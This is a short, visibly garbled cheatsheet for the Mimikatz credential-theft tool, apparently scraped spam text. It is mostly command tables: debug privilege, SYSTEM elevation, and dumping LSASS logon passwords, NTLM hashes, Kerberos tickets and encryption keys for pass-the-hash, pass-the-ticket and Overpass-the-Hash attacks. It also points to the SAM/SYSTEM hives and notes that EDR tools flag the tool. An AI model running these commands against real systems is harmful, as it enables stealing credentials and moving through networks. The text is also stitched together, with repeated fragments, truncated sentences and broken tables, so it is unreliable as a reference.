Mimikatz Cheatsheet ((exclusive)) May 2026

| Command | Purpose | | :--- | :--- | | mimikatz.exe | Launch the tool (interactive mode). | | mimikatz # privilege::debug | Seeks . This is the "master key" to interact with LSASS. | | mimikatz # token::elevate | Elevates to SYSTEM account (often needed for LSASS access). | | mimikatz # exit | Exit the Mimikatz console. |

However, with great power comes great responsibility. This cheatsheet is strictly for . ⚠️ Warning: Modern Antivirus (AV) and Endpoint Detection & Response (EDR) aggressively flag Mimikatz. You will rarely run the vanilla .exe on a live engagement today. Phase 1: Loading & Privilege Escalation Before running any commands, you must load Mimikatz and gain the necessary rights. mimikatz cheatsheet

| Command | Result | | :--- | :--- | | sekurlsa::logonpasswords | Dumps all active logon sessions (NTLM hashes + plaintext if WDigest is enabled). | | sekurlsa::tickets | Dumps all Kerberos tickets for pass-the-ticket attacks. | | sekurlsa::ekeys | Dumps Kerberos encryption keys (useful for Overpass-the-Hash). | 2. Extract SAM & SYSTEM Hives If LSASS is protected, go directly to the registry. | Command | Purpose | | :--- | :--- | | mimikatz

mimikatz.exe "privilege::debug" "token::elevate" "exit" 1. Grab Passwords from LSASS Memory (sekurlsa) This is the classic "pass-the-hash" or "pass-the-password" attack. | | mimikatz # token::elevate | Elevates to